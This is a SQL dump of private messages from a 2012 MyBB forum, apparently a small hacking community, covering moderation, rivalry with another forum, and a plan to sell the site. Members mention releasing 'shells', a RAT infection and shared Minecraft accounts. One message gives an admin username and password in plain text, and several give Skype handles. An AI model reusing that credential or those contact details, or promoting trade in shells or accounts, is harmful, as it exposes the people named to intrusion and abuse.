jok3r\'] Recently my PC broke down so I wont be able to log on long because I will log on my sisters PC. I\'m not sure by when I will get my new laptop but I\'m sure it will be around a week. Please try to keep LH active and please search for spam and take immediate action. [/quote] Okay sounds good.', '1348053237', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1917', '194', '82', '194', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Read', '0', '[quote=\'iTzIpod\'] You seem cool If you want, add me on Skype. Skype: iTzIpod If you maintain these HQ posts, (Keep posting your HQ posts) I will invite you to Unique. What is Unique? Unique is a Usergroup that I own. It\'s like a 1 time offer. You can either accept, or decline. We have leaks, tutorials, programs, etc. [/quote] Sounds good. Also I\'ll add you to skype. Thanks for the opportunity. :) ', '1348107046', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1943', '194', '82', '194', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Read', '0', '[quote=\'iTzIpod\'] [quote=\'Slender Man\'] [quote=\'iTzIpod\'] You seem cool If you want, add me on Skype. Skype: iTzIpod If you maintain these HQ posts, (Keep posting your HQ posts) I will invite you to Unique. What is Unique? Unique is a Usergroup that I own. It\'s like a 1 time offer. You can either accept, or decline. We have leaks, tutorials, programs, etc. [/quote] Sounds good. Also I\'ll add you to skype. Thanks for the opportunity. :) [/quote] Nah man, thank you. Because of you, I now have 1 new friend :3 [/quote] :cool: I don\'t know if I added the right person.. My Skype is theslendermann.', '1348108050', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1953', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Shells', '0', '[quote=\'iTzIpod\'] Hey I got some Shells. Where/Which section can I release them in? [/quote] Botnets section Even though they\'re not for ddosing but yeah. Anything internet stress test related there for now.', '1348182781', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1957', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Ads', '0', 'Why dont you want company ads? Well yeah this is my only question :P Thanks', '1348257713', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1960', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Ads', '0', '[quote=\'t3h jok3r\'] [quote=\'sirchamp\'] Why dont you want company ads? Well yeah this is my only question :P Thanks [/quote] Sorry, I can\'t answer that. It\'s due to some security reasons. [/quote] Lol. In a thread you said if someone wants to know why you dont want company ads he can ask you over pm. ', '1348299273', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1962', '53', '5', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '2', 'Hallo', '0', 'Timmy bist du deutsch? Ich bin Schweizer also spreche ich auch Deutsch ', '1348326563', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1966', '172', '82', '172', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Read', '0', '[quote=\'iTzIpod\'] I invited you into Unique. Please be Unique and wear the Userbar. :D Please be active or try to be active and post a lot outside and inside Unique. Thanks. - iTzIpod. Note: I have your MistaCode\'s PPD Method eBook. :D GetTheCode from HF. I didn\'t buy it. [/quote] That\'s v1 and v2 has been released. And soon I am done with v3 :D And yeah y got it from Leakforums didn\'t ya ? ;)', '1348331922', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1987', '53', '5', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '2', 'Re: Hallo', '0', '[quote=\'Timmy\'] [quote=\'sirchamp\'] Timmy bist du deutsch? Ich bin Schweizer also spreche ich auch Deutsch [/quote] Very good. JK I have no idea what you are on about. [/quote] Oh fuck. I tought you were german. Sorry', '1348499363', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2034', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Do me a favor', '0', '[quote=\'t3h jok3r\'] Keep an eye on mr407. If he views a lot of threads and posts no replies or views a lot of member profiles or sends more than 2 PMs then ban him immediately. [/quote] Will do, why whats wrong with him?', '1348542427', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2038', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Do me a favor', '0', 'Alright aha.', '1348542702', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2556', '243', '53', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Forum', '0', 'Hey there, just wanted to let you know about another awesome hacking forum (http://www.anarchyforums.net) - feel free to check us out if you\'re interested', '1349619883', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2595', '100', '199', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"199\";}}', '2', 'iTziPod needs your help ASAP!', '0', 'Alright so iPod caught a RAT, he would be PM\'ing you now, but hes having some difficulties. Could you add his skype? itzipod is the username I was hoping you could help him remove the RAT. Thanks!', '1349645633', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2553', '243', '3', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '2', 'Forum', '0', 'Hey there, just wanted to let you know about another awesome hacking forum (http://www.anarchyforums.net) - feel free to check us out if you\'re interested', '1349619837', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2551', '100', '82', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Mc accounts', '0', 'Can i have some minecraft accounts?(:', '1349614994', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2075', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\'] [quote=\'NXK\' pid=\'2530\' dateline=\'1348496037\'] [quote=\'Apathy\' pid=\'2512\' dateline=\'1348457287\'] Awesome about the rewards. I get to give them xD and ya it sucked that we were down. [/quote] Can you atleast attempt to use proper grammer? You\'re an admin, I\'m not trying to be rude but people aren\'t going to take us seriously if you\'re posting so LQ. I\'ve noticed this multiple times. [/quote] I agree man, can you please fix the grammar in posting? [/quote] Sure!', '1348690502', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2084', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Posting', '0', '[quote=\'t3h jok3r\'] This PM has been sent to multiple people. Sup guys, I was wondering if you guys could pick up your activity a little more. Which means please post more and do you know any computing or coding website? [/quote] I post daily. and yeah freelancer.com is a good one.', '1348710501', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3758', '61', '228', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Hello', '0', '[quote=\'VirtualLegend\'] When is my group Marketers officel on LH? [/quote] When you find a different userbar. Contact reloadzor he may be interested in making you one.', '1350940459', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2597', '100', '199', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"199\";}}', '2', 'oh and also', '0', 'if he randomly says FUCK YOU BITCH thats not actually him talking.', '1349645681', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2599', '243', '1', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Contact', '0', 'If you do plan on reneging on your deal, could we talk on MSN?', '1349647535', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2583', '243', '1', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Selling LH', '0', '[quote=\'t3h jok3r\'] I\'m done with LH, I want to sell it. Do you have Skype or MSN? [/quote] I do. Email: Unverified@hotmail.com', '1349631686', '0', '3', '1349633088', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2586', '243', '1', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Selling LH', '0', '[quote=\'The Anarchist\'] [quote=\'t3h jok3r\'] I\'m done with LH, I want to sell it. Do you have Skype or MSN? [/quote] I do. Email: Unverified@hotmail.com [/quote] I also have Skype: TheAnarchistAF', '1349633088', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4128', '4', '4', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"4\";}}', '1', 'Re: Help', '0', '[quote=\'Triple H\'] I\'m t3h jok3r and I got hacked. Add me on skype t3hjok3r Come online asap. [/quote] I got to go to school. D: I will be online when I get back.', '1352811673', '0', '0', '0', '0', '0', '1', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2588', '243', '1', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Selling LH', '0', '[quote=\'t3h jok3r\'] [quote=\'The Anarchist\'] [quote=\'t3h jok3r\'] I\'m done with LH, I want to sell it. Do you have Skype or MSN? [/quote] I do. Email: Unverified@hotmail.com [/quote] Do you have Skype? [/quote] TheAnarchistAF I am not sure if my PMs are going through', '1349633122', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3756', '228', '61', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Hello', '0', 'When is my group Marketers officel on LH?', '1350940404', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2580', '61', '53', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Accepted', '0', 'You have been accepted into gamers, Please be patient while we gather more members. Than we will start to post alot of content things like that.', '1349627431', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2572', '243', '9', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"9\";}}', '2', 'Forum', '0', 'Hey there, just wanted to let you know about another awesome hacking forum (http://www.anarchyforums.net) - feel free to check us out if you\'re interested', '1349620057', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2574', '243', '100', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '2', 'Anarchy Forums', '0', 'Hey there, just wanted to let you know about another awesome hacking forum (http://www.anarchyforums.net) - feel free to check us out if you\'re interested.', '1349620088', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2576', '243', '205', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"205\";}}', '2', 'Forum', '0', 'Hey there, just wanted to let you know about another awesome hacking forum (http://www.anarchyforums.net) - feel free to check us out if you\'re interested', '1349620106', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2714', '240', '1', '240', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Checking out LH?', '0', '[quote=\'t3h jok3r\'] 1. Moderator at Anarchy forums. 2. After \"stalking\" you on my board, I have noticed that you are going through my members profiles for the past 30 mins. 3. I\'m requesting you nicely to either leave or stay on L33THacking and be HQ + Active. If you spam, continue to view profiles, send messages violating our rules and regulations or DDoS LH then they will be consequences. Therefore, I\'m sending this PM to warn you and once again either leave LH or stay here and be HQ + Active. [/quote] Hello t3h jok3r, Let\'s not bring AnarchyForums Moderator Status into this conversation - it\'s not needed. You may think it \'sucks\', but that\'s your opinion. I\'ve been browsing through your site just observing if it was a place for me to stay - it looks quite good. I\'m not spamming (haven\'t made a single post), I\'m not sure what\'s wrong with viewing profiles & I am in no way sending any messages violating your rules. And I can assure you no one on AF was ddosing your site - that was nothing to do with us.', '1349728582', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2578', '100', '243', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"227\";}}', '2', 'Re: Anarchy Forums', '0', '[quote=\'Slenderman\'] Hey there, just wanted to let you know about another awesome hacking forum (http://www.anarchyforums.net) - feel free to check us out if you\'re interested. [/quote] Fucker, go away stop advertising on LH ', '1349623173', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2570', '243', '62', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Anarchy Forums', '0', 'Hey there, just wanted to let you know about another awesome hacking forum (http://www.anarchyforums.net) - feel free to check us out if you\'re interested.', '1349620052', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2558', '243', '213', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"213\";}}', '2', 'Anarchy Forums', '0', 'Hey there, just wanted to let you know about another awesome hacking forum (http://www.anarchyforums.net) - feel free to check us out if you\'re interested.', '1349619906', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2560', '243', '4', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"4\";}}', '2', 'Forum', '0', 'Hey there, just wanted to let you know about another awesome hacking forum (http://www.anarchyforums.net) - feel free to check us out if you\'re interested', '1349619940', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2562', '243', '5', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '2', 'Anarchy Forums', '0', 'Hey there, just wanted to let you know about another awesome hacking forum (http://www.anarchyforums.net) - feel free to check us out if you\'re interested.', '1349619976', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2564', '243', '203', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"203\";}}', '2', 'Forum', '0', 'Hey there, just wanted to let you know about another awesome hacking forum (http://www.anarchyforums.net) - feel free to check us out if you\'re interested', '1349619986', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2566', '243', '82', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Anarchy Forums', '0', 'Hey there, just wanted to let you know about another awesome hacking forum (http://www.anarchyforums.net) - feel free to check us out if you\'re interested.', '1349620009', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2568', '243', '55', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"55\";}}', '2', 'Forum', '0', 'Hey there, just wanted to let you know about another awesome hacking forum (http://www.anarchyforums.net) - feel free to check us out if you\'re interested', '1349620025', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2640', '222', '1', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Hey man', '0', 'Hey dude I have a skype chat started with a few of the members here on LH. Adding more and more members as I go. If you want to join just add me on skype : flamingworm and Ill add you to the chat', '1349658934', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2124', '20', '1', '20', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Sup', '0', '[quote=\'t3h jok3r\'] Sup man. [/quote] Nothing, I don\'t know how I just got this PM.', '1348861035', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2126', '100', '20', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"20\";}}', '2', 'Unique Private Section?', '0', 'Hey I can see your in the user group Unique, I am too, and I was wondering where that Unique posting section was. Thanks ~GRONgamer61', '1348861385', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2130', '2', '82', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Read', '0', '[quote=\'iTzIpod\'] I don\'t want to start a fight or anything, but I just want you to [b]try[/b]. Just [b]TRY[/b]. You don\'t have too. But you should [b]TRY[/b]. [b]Try[/b] to make more posts [b]Try[/b] to be less LQ and more HQ. [b]Try[/b] to be online more. (More active). That\'s all I want. [/quote] Fair enough. ', '1348863693', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2132', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'NXK\' pid=\'2530\' dateline=\'1348496037\'] [quote=\'Apathy\' pid=\'2512\' dateline=\'1348457287\'] Awesome about the rewards. I get to give them xD and ya it sucked that we were down. [/quote] Can you atleast attempt to use proper grammer? You\'re an admin, I\'m not trying to be rude but people aren\'t going to take us seriously if you\'re posting so LQ. I\'ve noticed this multiple times. [/quote] I agree man, can you please fix the grammar in posting? [/quote] Sure! [/quote] Thanks also what was your username and password to access ACP? It was something like poopie pipe. I need it again because we are now hosted on 3 servers so if we get DDoSed, I will move to another server. Everything will be perfect but I couldn\'t add your account again because I didn\'t have the password. You can access on this server only. [/quote] It is: Poopipie sosecret32 :P Also when I do make a thread people do not post. :/', '1348863821', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2134', '61', '203', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"203\";}}', '2', 'thread', '0', 'No hard feelings about that thread man. I was just letting you know that\'s all.', '1348872847', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2623', '243', '1', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: New deal', '0', '[quote=\'t3h jok3r\'] Your staff have sold your sites information to me, your members don\'t like your site, your sites best members are coming to my site, your staff are leaving your site because they are getting paid to join my website and stay active here. Your site is almost finished, if you want I can make you an Admin and I can give you a video guarantee that this is a real deal and if I cheat you then you can do whatever you want to do. In return, close down your site and tell everyone to join L33THacking. I will also give you 40% of everything I earn. [/quote] You must be on drugs.', '1349657277', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2151', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', 'Ah kk ;) [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'NXK\' pid=\'2530\' dateline=\'1348496037\'] [quote=\'Apathy\' pid=\'2512\' dateline=\'1348457287\'] Awesome about the rewards. I get to give them xD and ya it sucked that we were down. [/quote] Can you atleast attempt to use proper grammer? You\'re an admin, I\'m not trying to be rude but people aren\'t going to take us seriously if you\'re posting so LQ. I\'ve noticed this multiple times. [/quote] I agree man, can you please fix the grammar in posting? [/quote] Sure! [/quote] Thanks also what was your username and password to access ACP? It was something like poopie pipe. I need it again because we are now hosted on 3 servers so if we get DDoSed, I will move to another server. Everything will be perfect but I couldn\'t add your account again because I didn\'t have the password. You can access on this server only. [/quote] It is: Poopipie sosecret32 :P Also when I do make a thread people do not post. :/ [/quote] iTzIpod stays away from hacking and we don\'t have any real hacking section contributor. [/quote]', '1348888875', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3748', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Help Advertise LH', '0', '[quote=\'t3h jok3r\'] Hi XxTREYZxX, We are looking forward to people who are willing to help advertise LH. Don\'t worry, it\'s not going to take up much of your time. It would take hardly 10 minutes or else a day. This is completely voluntary, if you are interested then answer the following questions and post them [url=http://l33thacking.net/thread-1051.html]here[/url] [quote] 1. Do you have any spare email? 2. Do you know any hacker blogs? 3. Can you help advertise on twitter? 4. What search engine do you use? 5. Do you upload videos on youtube? 6. Are you registered on any active site that\'s not related to hacking? 7. Are you registered on hackforums or ubers? 8. If we provide you with programs and ebooks, can you share them on other sites? [/quote] Thanks for reading [/quote] of course i will advertise LH 1.no im very sorry only this one but i can make one 2.no i dont sorry 3.i dont have twiiter 4.dont know what this means 5.yes i do upload video\'s on you Tube. 6.yes i am planet minecraft 7.yes ubers and have been for a while now 8.yes of course i will there you go', '1350888282', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO 